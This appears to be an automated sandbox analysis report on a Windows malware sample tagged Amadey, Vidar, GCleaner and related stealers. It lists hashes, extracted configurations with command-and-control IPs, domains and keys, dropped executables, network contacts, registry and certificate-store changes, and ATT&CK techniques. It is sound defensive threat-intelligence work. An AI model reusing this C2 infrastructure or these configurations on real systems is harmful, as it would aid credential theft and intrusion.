amadey | c329c73a0c1f6f156cc7a662abdf5e7ea30ed8b8f4b35253bf7f2435b83445c8

Analysis

max time kernel
149s
max time network
151s
platform
windows7_x64
resource
win7-20241023-en
resource tags

arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
submitted
05-12-2024 09:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe
Size

7.5MB
MD5

c71460537b9584b5f550df694b80c9aa
SHA1

bf96ffa379cb297d91d994a63e04f03d94eb8139
SHA256

c329c73a0c1f6f156cc7a662abdf5e7ea30ed8b8f4b35253bf7f2435b83445c8
SHA512

613c7165a1572c72fae2c721bf0e896304eb52eb04463333fae39f699d6da5390a7ee103907c245bd8537a3a183e6e76610a1bfc557e029ae58bf23ef269dfea
SSDEEP

98304:gF8b2yodBaTJlvTuD17o2J5nsIsrInNI1TV++ykbHMOCXO6:g2b8SLA1M2sIX0kk5Ce6

Score

10^/10

amadey fabookie gcleaner onlylogger vidar 933 a6b927 discovery loader spyware stealer trojan

Malware Config

Extracted

Family

amadey

Version

2.61

Botnet

a6b927

http://185.215.113.25

Attributes

install_dir
e8a12a95fa
install_file
sqtvvs.exe
strings_key
1cc248008096bc1c8e6f468b951db183
url_paths
/f6vskbW/index.php

rc4.plain

Extracted

Family

vidar

Version

41.1

Botnet

933

https://mas.to/@bardak1ho

Attributes

profile_id
933

Extracted

Family

gcleaner

gcl-page.biz

194.145.227.161

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Fabookie payload 1 IoCs

resource	yara_rule
behavioral1/files/0x0005000000019458-84.dat	family_fabookie

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
Fabookie family
fabookie
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Onlylogger family
onlylogger
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

OnlyLogger payload 2 IoCs

resource	yara_rule
behavioral1/memory/3056-334-0x0000000000400000-0x0000000000877000-memory.dmp	family_onlylogger
behavioral1/memory/3056-383-0x0000000000400000-0x0000000000877000-memory.dmp	family_onlylogger

Vidar Stealer 1 IoCs

stealer

resource	yara_rule
behavioral1/memory/1640-331-0x0000000000400000-0x00000000008D7000-memory.dmp	family_vidar

Blocklisted process makes network request 14 IoCs

flow	pid	Process
47	2836	MsiExec.exe
49	2836	MsiExec.exe
50	2836	MsiExec.exe
55	2836	MsiExec.exe
57	2836	MsiExec.exe
59	2836	MsiExec.exe
61	2836	MsiExec.exe
64	2836	MsiExec.exe
66	2836	MsiExec.exe
82	2640	msiexec.exe
85	2536	MsiExec.exe
94	2836	MsiExec.exe
96	2124	rundll32.exe
102	2124	rundll32.exe

Executes dropped EXE 25 IoCs

pid	Process
2524	Chrome 5.exe
1640	Firstoffer.exe
3064	DownFlSetup110.exe
2956	inst001.exe
2952	install.exe
3056	setup.exe
2868	7.exe
1036	sfx_123_206.exe
1724	setup_2.exe
3008	jhuuee.exe
2000	lijun-game.exe
1044	Cleaner Installation.exe
3012	setup_2.tmp
2092	BearVpn 3.exe
1040	setup_2.exe
2248	sqtvvs.exe
1440	setup_2.tmp
2232	4MCYlgNAW.eXE
2312	services64.exe
2092	sqtvvs.exe
276	Cleaner Installation.exe
2684	sihost64.exe
972	sqtvvs.exe
1548	f7873aa.exe
1204	f78b1f1.exe

Loads dropped DLL 64 IoCs

pid	Process
2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe
2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe
2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe
2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe
2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe
2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe
2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe
2952	install.exe
2952	install.exe
2952	install.exe
3056	setup.exe
3056	setup.exe
3056	setup.exe
2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe
2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe
2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe
2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe
2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe
2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe
1724	setup_2.exe
2556	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe
3012	setup_2.tmp
3012	setup_2.tmp
3012	setup_2.tmp
1044	Cleaner Installation.exe
3012	setup_2.tmp
2952	install.exe
2952	install.exe
2248	sqtvvs.exe
2248	sqtvvs.exe
2248	sqtvvs.exe
1040	setup_2.exe
1440	setup_2.tmp
1440	setup_2.tmp
1440	setup_2.tmp
1580	cmd.exe
1928	rundll32.exe
1928	rundll32.exe
1928	rundll32.exe
2596	WerFault.exe
2596	WerFault.exe
2596	WerFault.exe
2596	WerFault.exe
2596	WerFault.exe
2836	MsiExec.exe
2836	MsiExec.exe
2836	MsiExec.exe
2836	MsiExec.exe
2836	MsiExec.exe
2836	MsiExec.exe
2836	MsiExec.exe
1924	WerFault.exe
1924	WerFault.exe
1924	WerFault.exe
1924	WerFault.exe
2124	rundll32.exe
2124	rundll32.exe
2124	rundll32.exe
2836	MsiExec.exe
2836	MsiExec.exe
2836	MsiExec.exe
2836	MsiExec.exe
2524	Chrome 5.exe
2836	MsiExec.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\L:	Cleaner Installation.exe
File opened (read-only)	\??\O:	Cleaner Installation.exe
File opened (read-only)	\??\X:	Cleaner Installation.exe
File opened (read-only)	\??\O:	Cleaner Installation.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\M:	Cleaner Installation.exe
File opened (read-only)	\??\Q:	Cleaner Installation.exe
File opened (read-only)	\??\Q:	Cleaner Installation.exe
File opened (read-only)	\??\Z:	Cleaner Installation.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	Cleaner Installation.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\P:	Cleaner Installation.exe
File opened (read-only)	\??\A:	Cleaner Installation.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\H:	Cleaner Installation.exe
File opened (read-only)	\??\Z:	Cleaner Installation.exe
File opened (read-only)	\??\K:	Cleaner Installation.exe
File opened (read-only)	\??\S:	Cleaner Installation.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\B:	Cleaner Installation.exe
File opened (read-only)	\??\I:	Cleaner Installation.exe
File opened (read-only)	\??\K:	Cleaner Installation.exe
File opened (read-only)	\??\R:	Cleaner Installation.exe
File opened (read-only)	\??\E:	Cleaner Installation.exe
File opened (read-only)	\??\Y:	Cleaner Installation.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	Cleaner Installation.exe
File opened (read-only)	\??\B:	Cleaner Installation.exe
File opened (read-only)	\??\U:	Cleaner Installation.exe
File opened (read-only)	\??\W:	Cleaner Installation.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\G:	Cleaner Installation.exe
File opened (read-only)	\??\H:	Cleaner Installation.exe
File opened (read-only)	\??\J:	Cleaner Installation.exe
File opened (read-only)	\??\P:	Cleaner Installation.exe
File opened (read-only)	\??\R:	Cleaner Installation.exe
File opened (read-only)	\??\V:	Cleaner Installation.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\J:	Cleaner Installation.exe
File opened (read-only)	\??\V:	Cleaner Installation.exe
File opened (read-only)	\??\M:	Cleaner Installation.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\N:	Cleaner Installation.exe
File opened (read-only)	\??\L:	Cleaner Installation.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	Cleaner Installation.exe
File opened (read-only)	\??\G:	Cleaner Installation.exe
File opened (read-only)	\??\I:	Cleaner Installation.exe
File opened (read-only)	\??\N:	Cleaner Installation.exe
File opened (read-only)	\??\T:	Cleaner Installation.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\E:	Cleaner Installation.exe
File opened (read-only)	\??\U:	Cleaner Installation.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 34 IoCs

Web Service

T1102

flow	ioc
89	raw.githubusercontent.com
99	iplogger.org
107	iplogger.org
114	iplogger.org
26	iplogger.org
62	iplogger.org
100	iplogger.org
103	iplogger.org
70	iplogger.org
88	iplogger.org
79	iplogger.org
109	iplogger.org
45	iplogger.org
67	iplogger.org
43	iplogger.org
27	iplogger.org
30	iplogger.org
110	iplogger.org
52	iplogger.org
105	iplogger.org
68	iplogger.org
113	iplogger.org
98	iplogger.org
108	iplogger.org
111	iplogger.org
112	iplogger.org
78	iplogger.org
90	raw.githubusercontent.com
51	iplogger.org
77	iplogger.org
97	iplogger.org
106	iplogger.org
25	iplogger.org
31	iplogger.org

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
18	ip-api.com

Drops file in Windows directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Windows\INF\setupapi.ev3	DrvInst.exe
File opened for modification	C:\Windows\INF\setupapi.ev1	DrvInst.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\f77c275.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\f77c275.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC83E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC87D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC4C2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC7EE.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC88E.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC92B.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\f77c276.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC80E.tmp	msiexec.exe
File created	C:\Windows\Installer\f77c276.ipi	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
2596	2092	WerFault.exe	44
1924	1640	WerFault.exe	31
1704	1548	WerFault.exe	103
932	1204	WerFault.exe	105

System Location Discovery: System Language Discovery 1 TTPs 41 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Firstoffer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup_2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lijun-game.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Cleaner Installation.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup_2.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f78b1f1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup_2.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4MCYlgNAW.eXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	inst001.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	control.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Cleaner Installation.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BearVpn 3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f7873aa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sfx_123_206.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sqtvvs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DownFlSetup110.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup_2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe

System Time Discovery 1 TTPs 1 IoCs

Adversary may gather the system time and/or time zone settings from a local or remote system.

discovery

System Time Discovery

T1124

pid	Process
276	Cleaner Installation.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
2060	taskkill.exe
2252	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies data under HKEY_USERS 43 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe

Modifies system certificate store 2 TTPs 7 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Cleaner Installation.exe
Key created	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C	Cleaner Installation.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = 030000000100000014000000d89e3bd43d5d909b47a18977aa9d5ce36cee184c1400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb040000000100000010000000285ec909c4ab0d2d57f5086b225799aa0f000000010000003000000013baa039635f1c5292a8c2f36aae7e1d25c025202e9092f5b0f53f5f752dfa9c71b3d1b8d9a6358fcee6ec75622fabf9190000000100000010000000ea6089055218053dd01e37e1d806eedf1800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa22000000001000000850500003082058130820469a00302010202103972443af922b751d7d36c10dd313595300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3139303331323030303030305a170d3238313233313233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c05000382010100188751dc74213d9c8ae027b733d02eccecf0e6cb5e11de226f9b758e9e72fee4d6feaa1f9c962def034a7eaef48d6f723c433bc03febb8df5caaa9c6aef2fcd8eea37b43f686367c14e0cdf4f73ffedeb8b48af09196fefd43647efdccd201a17d7df81919c9422b13bf588bbaa4a266047688914e0c8914cea24dc932b3bae8141abc71f15bf0410b98000a220310e50cb1f9cd923719ed3bf1e43ab6f945132675afbbaaef3f7b773bd2c402913d1900d3175c39db3f7b180d45cd9385962f5ddf59164f3f51bdd545183fed4a8ee80661742316b50d50732744477f105d892a6b853114c4e8a96a4c80bc6a78cfb87f8e7672990c9dfed7910816a1a35f95	Cleaner Installation.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	DownFlSetup110.exe
